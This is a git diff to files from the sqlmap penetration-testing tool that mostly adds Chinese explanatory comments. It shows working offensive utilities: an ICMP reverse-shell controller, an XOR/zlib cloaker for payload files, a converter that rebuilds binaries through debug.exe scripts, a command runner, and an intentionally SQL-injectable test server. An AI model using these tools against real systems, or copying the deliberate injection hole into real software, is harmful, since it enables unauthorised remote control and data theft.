-            _win_wav_play(BEEP_WAV_FILENAME)
+            _win_wav_play(BEEP_WAV_FILENAME)  # Windows 系统使用 WAV 播放
         elif sys.platform.startswith("darwin"):
-            _mac_beep()
+            _mac_beep()  # macOS 系统使用系统蜂鸣
         elif sys.platform.startswith("cygwin"):
-            _cygwin_beep(BEEP_WAV_FILENAME)
+            _cygwin_beep(BEEP_WAV_FILENAME)  # Cygwin 使用音频文件播放
         elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")):
-            _linux_wav_play(BEEP_WAV_FILENAME)
+            _linux_wav_play(BEEP_WAV_FILENAME)  # Linux 和 FreeBSD 系统使用 WAV 播放
         else:
-            _speaker_beep()
+            _speaker_beep()  # 其他系统使用控制台蜂鸣
     except:
+        # 捕获异常并使用控制台蜂鸣
         _speaker_beep()
 
 def _speaker_beep():
-    sys.stdout.write('\a')  # doesn't work on modern Linux systems
+    """在控制台播放蜂鸣声（警报声）。"""
+    sys.stdout.write('\a')  # 在现代 Linux 系统上可能无效
 
     try:
-        sys.stdout.flush()
+        sys.stdout.flush()  # 尝试刷新标准输出
     except IOError:
-        pass
+        pass  # 忽略任何 I/O 错误
 
-# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html
+# Cygwin 使用系统命令播放音频文件
 def _cygwin_beep(filename):
     os.system("play-sound-file '%s' 2>/dev/null" % filename)
 
+# macOS 系统使用 Carbon 库的 SysBeep 函数
 def _mac_beep():
-    import Carbon.Snd
-    Carbon.Snd.SysBeep(1)
+    import Carbon.Snd  # 导入 Carbon 库
+    Carbon.Snd.SysBeep(1)  # 播放系统蜂鸣声
 
+# Windows 系统播放 WAV 文件
 def _win_wav_play(filename):
-    import winsound
+    import winsound  # 导入 winsound 库
 
-    winsound.PlaySound(filename, winsound.SND_FILENAME)
+    winsound.PlaySound(filename, winsound.SND_FILENAME)  # 播放指定的 WAV 文件
 
+# Linux 系统播放 WAV 文件的实现
 def _linux_wav_play(filename):
+    # 尝试使用不同的命令播放音频文件
     for _ in ("aplay", "paplay", "play"):
         if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
-            return
+            return  # 成功播放音乐后返回
 
-    import ctypes
+    import ctypes  # 导入 ctypes 库以调用 C 函数
 
+    # PulseAudio 的相关常量定义
     PA_STREAM_PLAYBACK = 1
     PA_SAMPLE_S16LE = 3
-    BUFFSIZE = 1024
+    BUFFSIZE = 1024  # 缓冲区大小
 
+    # 定义 PulseAudio 样本规格的结构
     class struct_pa_sample_spec(ctypes.Structure):
         _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
 
     try:
-        pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
+        pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")  # 加载 PulseAudio 库
     except OSError:
-        return
+        return  # 如果加载失败，则返回
 
+    # 打开 WAV 文件
     wave_file = wave.open(filename, "rb")
 
+    # 设置 PulseAudio 样本规格
     pa_sample_spec = struct_pa_sample_spec()
-    pa_sample_spec.rate = wave_file.getframerate()
-    pa_sample_spec.channels = wave_file.getnchannels()
-    pa_sample_spec.format = PA_SAMPLE_S16LE
+    pa_sample_spec.rate = wave_file.getframerate()  # 获取采样频率
+    pa_sample_spec.channels = wave_file.getnchannels()  # 获取声道数
+    pa_sample_spec.format = PA_SAMPLE_S16LE  # 设置样本格式
 
     error = ctypes.c_int(0)
 
-    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
+    # 创建 PulseAudio 流
+    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None,
+                                  "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
     if not pa_stream:
         raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
 
     while True:
+        # 获取延迟
         latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
         if latency == -1:
             raise Exception("Getting latency failed")
 
-        buf = wave_file.readframes(BUFFSIZE)
+        buf = wave_file.readframes(BUFFSIZE)  # 从 WAV 文件读取帧
         if not buf:
-            break
+            break  # 如果没有更多帧可读，退出循环
 
+        # 播放读取的帧
         if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
             raise Exception("Could not play file")
 
-    wave_file.close()
+    wave_file.close()  # 关闭 WAV 文件
 
+    # 确保所有数据都已播放完成
     if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
         raise Exception("Could not simple drain")
 
-    pa.pa_simple_free(pa_stream)
+    pa.pa_simple_free(pa_stream)  # 释放 PulseAudio 流资源
 
 if __name__ == "__main__":
-    beep()
+    beep()  # 调用蜂鸣函数
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/cloak/cloak.py b/src/sqlmap-master/extra/cloak/cloak.py
index 8f361a0..ee8a396 100644
--- a/src/sqlmap-master/extra/cloak/cloak.py
+++ b/src/sqlmap-master/extra/cloak/cloak.py
@@ -7,82 +7,99 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-from __future__ import print_function
+from __future__ import print_function  # 兼容 Python 2 和 3 的 print 函数
 
 import os
 import struct
 import sys
-import zlib
+import zlib  # 用于数据压缩和解压缩
 
 from optparse import OptionError
 from optparse import OptionParser
 
+# 在 Python 3 中定义 xrange 和 ord 的兼容
 if sys.version_info >= (3, 0):
-    xrange = range
-    ord = lambda _: _
+    xrange = range  # 使用 Python 3 的 range
+    ord = lambda _: _  # 在 Python 3 中直接使用字符
 
-KEY = b"E6wRbVhD0IBeCiGJ"
+KEY = b"E6wRbVhD0IBeCiGJ"  # 定义加密/解密的密钥
 
 def xor(message, key):
+    """执行 XOR 操作，返回加密或解密后的字节序列。"""
+    # 对 message 的每个字节进行 XOR 运算，并返回字节串
     return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
 
 def cloak(inputFile=None, data=None):
+    """对输入文件或数据进行加密和压缩。"""
     if data is None:
+        # 如果没有提供数据，则读取文件内容
         with open(inputFile, "rb") as f:
-            data = f.read()
+            data = f.read()  # 以二进制模式读取文件数据
 
+    # 对数据进行压缩后再使用 XOR 加密
     return xor(zlib.compress(data), KEY)
 
 def decloak(inputFile=None, data=None):
+    """对输入文件或数据进行解密和解压缩。"""
     if data is None:
+        # 如果没有提供数据，则读取文件内容
         with open(inputFile, "rb") as f:
             data = f.read()
+
     try:
+        # 首先对数据进行 XOR 解密，然后解压缩
         data = zlib.decompress(xor(data, KEY))
     except Exception as ex:
+        # 如果解压缩过程中发生异常，打印错误信息并退出
         print(ex)
         print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
         sys.exit(1)
     finally:
-        f.close()
+        f.close()  # 确保文件流被关闭
 
-    return data
+    return data  # 返回解密后的数据
 
 def main():
-    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
-    parser = OptionParser(usage=usage, version='0.2')
+    """主函数，负责解析命令行参数并执行加密或解密操作。"""
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]  # 使用说明
+    parser = OptionParser(usage=usage, version='0.2')  # 创建 OptionParser 对象
 
     try:
-        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
-        parser.add_option('-i', dest='inputFile', help='Input file')
-        parser.add_option('-o', dest='outputFile', help='Output file')
+        # 添加命令行选项
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')  # 解密选项
+        parser.add_option('-i', dest='inputFile', help='Input file')  # 输入文件选项
+        parser.add_option('-o', dest='outputFile', help='Output file')  # 输出文件选项
 
-        (args, _) = parser.parse_args()
+        (args, _) = parser.parse_args()  # 解析命令行参数
 
         if not args.inputFile:
-            parser.error('Missing the input file, -h for help')
+            parser.error('Missing the input file, -h for help')  # 如果未提供输入文件，则报错
 
     except (OptionError, TypeError) as ex:
-        parser.error(ex)
+        parser.error(ex)  # 捕获解析错误
 
+    # 检查输入文件是否存在
     if not os.path.isfile(args.inputFile):
         print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile)
         sys.exit(1)
 
+    # 根据是否需要解密选择处理函数
     if not args.decrypt:
-        data = cloak(args.inputFile)
+        data = cloak(args.inputFile)  # 加密文件内容
     else:
-        data = decloak(args.inputFile)
+        data = decloak(args.inputFile)  # 解密文件内容
 
+    # 如果未指定输出文件名，则根据是否解密自动生成
     if not args.outputFile:
         if not args.decrypt:
-            args.outputFile = args.inputFile + '_'
+            args.outputFile = args.inputFile + '_'  # 添加后缀表示加密
         else:
-            args.outputFile = args.inputFile[:-1]
+            args.outputFile = args.inputFile[:-1]  # 移除后缀表示解密
 
+    # 写入结果到输出文件
     f = open(args.outputFile, 'wb')
-    f.write(data)
-    f.close()
+    f.write(data)  # 写入数据
+    f.close()  # 关闭文件
 
 if __name__ == '__main__':
-    main()
+    main()  # 程序入口
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/dbgtool/dbgtool.py b/src/sqlmap-master/extra/dbgtool/dbgtool.py
index 5443af7..bc1b1be 100644
--- a/src/sqlmap-master/extra/dbgtool/dbgtool.py
+++ b/src/sqlmap-master/extra/dbgtool/dbgtool.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-from __future__ import print_function
+from __future__ import print_function  # 兼容 Python 2 和 3 的 print 函数
 
 import os
 import sys
@@ -16,81 +16,97 @@ from optparse import OptionError
 from optparse import OptionParser
 
 def convert(inputFile):
-    fileStat = os.stat(inputFile)
-    fileSize = fileStat.st_size
+    """将给定的二进制输入文件转换为 ASCII 调试脚本。"""
+    fileStat = os.stat(inputFile)  # 获取文件状态
+    fileSize = fileStat.st_size  # 获取文件大小
 
+    # 检查文件大小是否超过 65280 字节（可调试的最大限制）
     if fileSize > 65280:
         print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
-        sys.exit(1)
+        sys.exit(1)  # 如果文件太大，退出程序
 
-    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
-    script += "%x\nf 0100 ffff 00\n" % fileSize
-    scrString = ""
-    counter = 256
-    counter2 = 0
+    # 开始构建调试脚本
+    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))  # 设置脚本名称
+    script += "%x\nf 0100 ffff 00\n" % fileSize  # 写入文件大小信息
+    scrString = ""  # 用于构建写入命令
+    counter = 256  # 地址计数器从 256 开始
+    counter2 = 0  # 0 计数器，用于控制输出的字符数
 
+    # 读取输入文件的二进制内容
     fp = open(inputFile, "rb")
-    fileContent = fp.read()
+    fileContent = fp.read()  # 读取所有内容
 
+    # 遍历文件的每个字节
     for fileChar in fileContent:
+        # 在 Python 3 中字符是字节，直接使用；在 Python 2 中需要使用 ord() 函数
         unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar)
 
+        # 如果字符不是空字节（0），则进行处理
         if unsignedFileChar != 0:
-            counter2 += 1
+            counter2 += 1  # 增加有效字符计数
 
             if not scrString:
+                # 如果 scrString 为空，开始创建新的写入命令
                 scrString = "e %0x %02x" % (counter, unsignedFileChar)
             else:
+                # 否则，将字符附加到 scrString 中
                 scrString += " %02x" % unsignedFileChar
         elif scrString:
+            # 如果遇到空字节，且 scrString 中有内容，需要把当前 scrString 添加到脚本
             script += "%s\n" % scrString
-            scrString = ""
-            counter2 = 0
+            scrString = ""  # 清空 scrString
+            counter2 = 0  # 重置有效字符计数
 
-        counter += 1
+        counter += 1  # 增加地址计数器
 
+        # 每 20 个有效字符输出一次
         if counter2 == 20:
-            script += "%s\n" % scrString
-            scrString = ""
-            counter2 = 0
+            script += "%s\n" % scrString  # 将当前 scrString 加入脚本
+            scrString = ""  # 清空 scrString
+            counter2 = 0  # 重置计数
 
+    # 完成脚本，添加结束指令
     script += "w\nq\n"
 
-    return script
+    return script  # 返回生成的调试脚本
 
 def main(inputFile, outputFile):
+    """主功能，处理文件输入输出。"""
+    # 检查输入文件是否是常规文件
     if not os.path.isfile(inputFile):
         print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
-        sys.exit(1)
+        sys.exit(1)  # 如果不是，退出程序
 
+    # 调用转换函数
     script = convert(inputFile)
 
+    # 如果提供了输出文件，写入脚本
     if outputFile:
-        fpOut = open(outputFile, "w")
-        sys.stdout = fpOut
-        sys.stdout.write(script)
-        sys.stdout.close()
+        with open(outputFile, "w") as fpOut:
+            sys.stdout = fpOut  # 将标准输出重定向到输出文件
+            sys.stdout.write(script)  # 写入脚本内容
+            sys.stdout.close()  # 关闭文件
     else:
-        print(script)
+        print(script)  # 如果没有输出文件，直接打印脚本
 
 if __name__ == "__main__":
-    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
-    parser = OptionParser(usage=usage, version="0.1")
+    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]  # 程序用法说明
+    parser = OptionParser(usage=usage, version="0.1")  # 创建解析器
 
     try:
-        parser.add_option("-i", dest="inputFile", help="Input binary file")
-
-        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")
+        # 添加命令行选项
+        parser.add_option("-i", dest="inputFile", help="Input binary file")  # 输入文件
+        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")  # 输出文件
 
-        (args, _) = parser.parse_args()
+        (args, _) = parser.parse_args()  # 解析参数
 
         if not args.inputFile:
-            parser.error("Missing the input file, -h for help")
+            parser.error("Missing the input file, -h for help")  # 必须提供输入文件
 
     except (OptionError, TypeError) as ex:
-        parser.error(ex)
+        parser.error(ex)  # 捕获错误并报告
 
-    inputFile = args.inputFile
-    outputFile = args.outputFile
+    inputFile = args.inputFile  # 输入文件名
+    outputFile = args.outputFile  # 输出文件名
 
-    main(inputFile, outputFile)
+    main(inputFile, outputFile)  # 调用主函数
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/icmpsh/icmpsh_m.py b/src/sqlmap-master/extra/icmpsh/icmpsh_m.py
index 17370fd..70de16c 100644
--- a/src/sqlmap-master/extra/icmpsh/icmpsh_m.py
+++ b/src/sqlmap-master/extra/icmpsh/icmpsh_m.py
@@ -5,7 +5,6 @@
 #
 #  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
 #
-#
 #  This program is free software: you can redistribute it and/or modify
 #  it under the terms of the GNU General Public License as published by
 #  the Free Software Foundation, either version 3 of the License, or
@@ -28,117 +27,117 @@ def setNonBlocking(fd):
     """
     Make a file descriptor non-blocking
     """
+    import fcntl  # 导入用于文件控制选项的库
 
-    import fcntl
-
-    flags = fcntl.fcntl(fd, fcntl.F_GETFL)
-    flags = flags | os.O_NONBLOCK
-    fcntl.fcntl(fd, fcntl.F_SETFL, flags)
+    flags = fcntl.fcntl(fd, fcntl.F_GETFL)  # 获取当前文件描述符的状态标志
+    flags = flags | os.O_NONBLOCK  # 将非阻塞标志添加到当前标志
+    fcntl.fcntl(fd, fcntl.F_SETFL, flags)  # 设置文件描述符为非阻塞模式
 
 def main(src, dst):
+    """主程序函数，用于设置 ICMP socket 和处理命令。"""
     if sys.platform == "nt":
-        sys.stderr.write('icmpsh master can only run on Posix systems\n')
+        sys.stderr.write('icmpsh master can only run on Posix systems\n')  # 检查是否在 Windows 上运行
         sys.exit(255)
 
     try:
-        from impacket import ImpactDecoder
-        from impacket import ImpactPacket
+        from impacket import ImpactDecoder  # 导入 Impacket 库用于解析数据包
+        from impacket import ImpactPacket  # 导入 Impacket 用于构建数据包
     except ImportError:
-        sys.stderr.write('You need to install Python Impacket library first\n')
+        sys.stderr.write('You need to install Python Impacket library first\n')  # 检查是否安装 Impacket
         sys.exit(255)
 
-    # Make standard input a non-blocking file
-    stdin_fd = sys.stdin.fileno()
+    # 将标准输入设置为非阻塞
+    stdin_fd = sys.stdin.fileno()  # 获取标准输入的文件描述符
     setNonBlocking(stdin_fd)
 
-    # Open one socket for ICMP protocol
-    # A special option is set on the socket so that IP headers are included
-    # with the returned data
+    # 为 ICMP 协议打开一个 socket
     try:
-        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
+        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)  # 创建原始 ICMP socket
     except socket.error:
-        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
+        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')  # 检查运行权限
         sys.exit(1)
 
-    sock.setblocking(0)
-    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+    sock.setblocking(0)  # 设置 socket 为非阻塞模式
+    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  # 启用 IP 头包含在发送包中
 
-    # Create a new IP packet and set its source and destination addresses
+    # 创建一个新的 IP 包，设置源和目的地址
     ip = ImpactPacket.IP()
-    ip.set_ip_src(src)
-    ip.set_ip_dst(dst)
+    ip.set_ip_src(src)  # 设置源 IP
+    ip.set_ip_dst(dst)  # 设置目标 IP
 
-    # Create a new ICMP packet of type ECHO REPLY
+    # 创建一个新的 ICMP 包，类型为回显应答（ECHO REPLY）
     icmp = ImpactPacket.ICMP()
     icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)
 
-    # Instantiate an IP packets decoder
+    # 实例化 IP 数据包解码器
     decoder = ImpactDecoder.IPDecoder()
 
+    # 在无限循环中发送和接收命令
     while True:
         try:
             cmd = ''
 
-            # Wait for incoming replies
-            if sock in select.select([sock], [], [])[0]:
-                buff = sock.recv(4096)
+            # 等待输入的回复
+            if sock in select.select([sock], [], [])[0]:  # 监控 socket 是否可读
+                buff = sock.recv(4096)  # 接收最大 4096 字节的数据
 
                 if 0 == len(buff):
-                    # Socket remotely closed
+                    # 如果接收到的数据长度为 0，说明对方关闭了 socket
                     sock.close()
                     sys.exit(0)
 
-                # Packet received; decode and display it
-                ippacket = decoder.decode(buff)
-                icmppacket = ippacket.child()
+                # 解析接收到的数据包
+                ippacket = decoder.decode(buff)  # 解码 IP 包
+                icmppacket = ippacket.child()  # 获取 ICMP 包
 
-                # If the packet matches, report it to the user
+                # 检查 ICMP 数据包的源和目的地址以及类型
                 if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():
-                    # Get identifier and sequence number
+                    # 获取标识符和序列号
                     ident = icmppacket.get_icmp_id()
                     seq_id = icmppacket.get_icmp_seq()
-                    data = icmppacket.get_data_as_string()
+                    data = icmppacket.get_data_as_string()  # 获取数据
 
                     if len(data) > 0:
-                        sys.stdout.write(data)
+                        sys.stdout.write(data)  # 输出接收到的数据
 
-                    # Parse command from standard input
+                    # 从标准输入读取命令
                     try:
-                        cmd = sys.stdin.readline()
+                        cmd = sys.stdin.readline()  # 读取用户输入的命令
                     except:
                         pass
 
-                    if cmd == 'exit\n':
+                    if cmd == 'exit\n':  # 如果输入为 'exit'，退出循环
                         return
 
-                    # Set sequence number and identifier
+                    # 设置序列号和标识符，以便回复
                     icmp.set_icmp_id(ident)
                     icmp.set_icmp_seq(seq_id)
 
-                    # Include the command as data inside the ICMP packet
+                    # 将命令作为数据包含在 ICMP 包中
                     icmp.contains(ImpactPacket.Data(cmd))
 
-                    # Calculate its checksum
+                    # 计算 ICMP 包的校验和
                     icmp.set_icmp_cksum(0)
-                    icmp.auto_checksum = 1
+                    icmp.auto_checksum = 1  # 自动计算校验和
 
-                    # Have the IP packet contain the ICMP packet (along with its payload)
+                    # 将 ICMP 包插入到 IP 包中
                     ip.contains(icmp)
 
                     try:
-                        # Send it to the target host
+                        # 发送数据包到目标主机
                         sock.sendto(ip.get_packet(), (dst, 0))
                     except socket.error as ex:
-                        sys.stderr.write("'%s'\n" % ex)
+                        sys.stderr.write("'%s'\n" % ex)  # 输出错误信息
                         sys.stderr.flush()
         except:
             break
 
 if __name__ == '__main__':
+    # 检查参数，确保提供了源 IP 和目标 IP
     if len(sys.argv) < 3:
         msg = 'missing mandatory options. Execute as root:\n'
         msg += './icmpsh-m.py <source IP address> <destination IP address>\n'
         sys.stderr.write(msg)
         sys.exit(1)
 
-    main(sys.argv[1], sys.argv[2])
+    main(sys.argv[1], sys.argv[2])  # 调用主函数，传入源和目标 IP
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp
index 743f2a2..31ae1f9 100644
--- a/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp
+++ b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp
@@ -2,7 +2,7 @@
 	runcmd - a program for running command prompt commands
 	Copyright (C) 2010 Miroslav Stampar
 	email: miroslav.stampar@gmail.com
-	
+
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
 	License as published by the Free Software Foundation; either
@@ -25,22 +25,27 @@
 #include <string>
 
 using namespace std;
+
 int main(int argc, char* argv[])
 {
-  FILE *fp;
-  string cmd;
+  FILE *fp; 
+  string cmd; 
 
-  for( int count = 1; count < argc; count++ )
-	cmd += " " + string(argv[count]);
+  // 从命令行参数获取命令并构建完整的命令字符串
+  for (int count = 1; count < argc; count++)
+    cmd += " " + string(argv[count]); // 将每个参数添加到 cmd 字符串中，并用空格分隔
 
+  // 使用 _popen() 函数以只读的方式打开一个命令进程
   fp = _popen(cmd.c_str(), "r");
 
+  // 检查文件指针是否有效
   if (fp != NULL) {
-    char buffer[BUFSIZ];
+    char buffer[BUFSIZ]; // 声明一个缓冲区用于接收输出
 
+    // 读取命令的输出并将其写到标准输出
     while (fgets(buffer, sizeof buffer, fp) != NULL)
-      fputs(buffer, stdout);
+      fputs(buffer, stdout); // 将缓冲区的内容输出到控制台
   }
 
   return 0;
-}
+}
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/shutils/duplicates.py b/src/sqlmap-master/extra/shutils/duplicates.py
index 8f09a59..df39403 100644
--- a/src/sqlmap-master/extra/shutils/duplicates.py
+++ b/src/sqlmap-master/extra/shutils/duplicates.py
@@ -3,28 +3,32 @@
 # Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
-# Removes duplicate entries in wordlist like files
+# Removes duplicate entries in wordlist-like files
 
-from __future__ import print_function
+from __future__ import print_function  # 确保使用 Python 3 的 print() 函数
 
-import sys
+import sys  # 导入系统模块，用于处理命令行参数和文件操作
 
 if __name__ == "__main__":
+    # 检查程序是否接收到至少一个命令行参数
     if len(sys.argv) > 1:
-        items = list()
+        items = list()  # 初始化一个列表用于存储唯一条目
 
+        # 打开指定的文件进行读取
         with open(sys.argv[1], 'r') as f:
-            for item in f:
-                item = item.strip()
+            for item in f:  # 遍历文件中的每一行
+                item = item.strip()  # 去掉行首尾的空白字符
+
                 try:
-                    str.encode(item)
-                    if item in items:
-                        if item:
-                            print(item)
+                    str.encode(item)  # 尝试对字符串编码，确保内容是有效的字符串
+                    if item in items:  # 检查条目是否已经在列表中
+                        if item:  # 确保条目不为空
+                            print(item)  # 打印重复的条目
                     else:
-                        items.append(item)
+                        items.append(item)  # 如果条目不在列表中，则添加到列表
                 except:
-                    pass
+                    pass  # 捕获异常，继续处理下一个条目
 
+        # 以写入模式打开同一个文件，准备写入去重后的唯一条目
         with open(sys.argv[1], 'w+') as f:
-            f.writelines("\n".join(items))
+            f.writelines("\n".join(items))  # 将唯一条目写回文件，以换行符分隔
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/shutils/newlines.py b/src/sqlmap-master/extra/shutils/newlines.py
index fe28a35..a2899b6 100644
--- a/src/sqlmap-master/extra/shutils/newlines.py
+++ b/src/sqlmap-master/extra/shutils/newlines.py
@@ -6,25 +6,30 @@ import os
 import sys
 
 def check(filepath):
-    if filepath.endswith(".py"):
-        content = open(filepath, "rb").read()
-        pattern = "\n\n\n".encode("ascii")
+    # 检查给定路径的文件
+    if filepath.endswith(".py"):  # 检查文件扩展名是否为 .py
+        content = open(filepath, "rb").read()  # 以二进制模式打开文件并读取全部内容
+        pattern = "\n\n\n".encode("ascii")  # 定义一个二进制模式的换行符序列，表示三个换行符
 
+        # 检查内容中是否包含三个连续的换行符
         if pattern in content:
-            index = content.find(pattern)
+            index = content.find(pattern)  # 找到模式在内容中的第一个出现位置
+            # 打印文件路径和模式前后各 30 个字节的内容
             print(filepath, repr(content[index - 30:index + 30]))
 
 if __name__ == "__main__":
     try:
-        BASE_DIRECTORY = sys.argv[1]
-    except IndexError:
+        BASE_DIRECTORY = sys.argv[1]  # 尝试获取命令行中指定的目录路径
+    except IndexError:  # 如果没有指定目录参数
         print("no directory specified, defaulting to current working directory")
-        BASE_DIRECTORY = os.getcwd()
+        BASE_DIRECTORY = os.getcwd()  # 使用当前工作目录作为默认目录
 
     print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY)
+    # 遍历指定目录及其子目录中的所有文件
     for root, dirs, files in os.walk(BASE_DIRECTORY):
+        # 如果路径中包含 "extra" 或 "thirdparty"，则跳过该目录
         if any(_ in root for _ in ("extra", "thirdparty")):
             continue
-        for name in files:
-            filepath = os.path.join(root, name)
-            check(filepath)
+        for name in files:  # 遍历文件列表
+            filepath = os.path.join(root, name)  # 构建文件的完整路径
+            check(filepath)  # 调用 check 函数检查该文件
\ No newline at end of file
diff --git a/src/sqlmap-master/extra/vulnserver/vulnserver.py b/src/sqlmap-master/extra/vulnserver/vulnserver.py
index cfa1d1b..bb00798 100644
--- a/src/sqlmap-master/extra/vulnserver/vulnserver.py
+++ b/src/sqlmap-master/extra/vulnserver/vulnserver.py
@@ -6,6 +6,9 @@ vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
 Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
+# 该脚本实现了一个简单的 HTTP 服务器，故意留下 SQL 注入漏洞，供测试和学习之用。
+# 它展示了基本的 Web 服务器如何处理请求、解析参数以及如何与 SQLite 数据库交互。
+# 此类工具应仅在安全的实验环境中使用，以避免滥用和安全风险。在实际应用中，开发者应注意保护数据库查询以防止 SQL 注入攻击。
 
 from __future__ import print_function
 
@@ -17,29 +20,26 @@ import sys
 import threading
 import traceback
 
+# 检查 Python 版本
 PY3 = sys.version_info >= (3, 0)
-UNICODE_ENCODING = "utf-8"
-DEBUG = False
+UNICODE_ENCODING = "utf-8"  # 定义 Unicode 编码
+DEBUG = False  # 调试模式标志
 
 if PY3:
-    from http.client import INTERNAL_SERVER_ERROR
-    from http.client import NOT_FOUND
-    from http.client import OK
-    from http.server import BaseHTTPRequestHandler
-    from http.server import HTTPServer
+    # 导入 Python 3 中的 HTTP 相关模块
+    from http.client import INTERNAL_SERVER_ERROR, NOT_FOUND, OK
+    from http.server import BaseHTTPRequestHandler, HTTPServer
     from socketserver import ThreadingMixIn
-    from urllib.parse import parse_qs
-    from urllib.parse import unquote_plus
+    from urllib.parse import parse_qs, unquote_plus
 else:
-    from BaseHTTPServer import BaseHTTPRequestHandler
-    from BaseHTTPServer import HTTPServer
-    from httplib import INTERNAL_SERVER_ERROR
-    from httplib import NOT_FOUND
-    from httplib import OK
+    # 对于 Python 2，导入相应的 HTTP 相关模块
+    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+    from httplib import INTERNAL_SERVER_ERROR, NOT_FOUND, OK
     from SocketServer import ThreadingMixIn
     from urlparse import parse_qs
     from urllib import unquote_plus
 
+# SQLite 模式定义，创建用户表并插入示例数据
 SCHEMA = """
     CREATE TABLE users (
         id INTEGER,
@@ -54,9 +54,11 @@ SCHEMA = """
     INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
 """
 
+# 定义监听地址和端口
 LISTEN_ADDRESS = "localhost"
 LISTEN_PORT = 8440
 
+# 全局变量
 _conn = None
 _cursor = None
 _lock = None
@@ -68,13 +70,15 @@ def init(quiet=False):
     global _cursor
     global _lock
 
+    # 在内存中创建 SQLite 数据库连接
     _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
-    _cursor = _conn.cursor()
-    _lock = threading.Lock()
+    _cursor = _conn.cursor()  # 创建游标，用于执行 SQL 命令
+    _lock = threading.Lock()  # 创建线程锁，以处理多线程环境下的数据库访问
 
-    _cursor.executescript(SCHEMA)
+    _cursor.executescript(SCHEMA)  # 执行脚本以创建表并插入数据
 
     if quiet:
+        # 如果 quiet 为 True，则禁止输出
         global print
 
         def _(*args, **kwargs):
@@ -83,6 +87,7 @@ def init(quiet=False):
         print = _
 
 class ThreadingServer(ThreadingMixIn, HTTPServer):
+    # 允许多线程处理 HTTP 请求
     def finish_request(self, *args, **kwargs):
         try:
             HTTPServer.finish_request(self, *args, **kwargs)
@@ -91,13 +96,16 @@ class ThreadingServer(ThreadingMixIn, HTTPServer):
                 traceback.print_exc()
 
 class ReqHandler(BaseHTTPRequestHandler):
+    # 请求处理类
     def do_REQUEST(self):
+        # 处理请求，分割路径和查询字符串
         path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
         params = {}
 
         if query:
-            params.update(parse_qs(query))
+            params.update(parse_qs(query))  # 解析查询字符串为字典
 
+            # 检查是否出现恶意脚本
             if "<script>" in unquote_plus(query):
                 self.send_response(INTERNAL_SERVER_ERROR)
                 self.send_header("X-Powered-By", "Express")
@@ -106,18 +114,25 @@ class ReqHandler(BaseHTTPRequestHandler):
                 self.wfile.write("CLOUDFLARE_ERROR_500S_BOX".encode(UNICODE_ENCODING))
                 return
 
+        # 处理请求数据（如果有）
         if hasattr(self, "data"):
             if self.data.startswith('{') and self.data.endswith('}'):
-                params.update(json.loads(self.data))
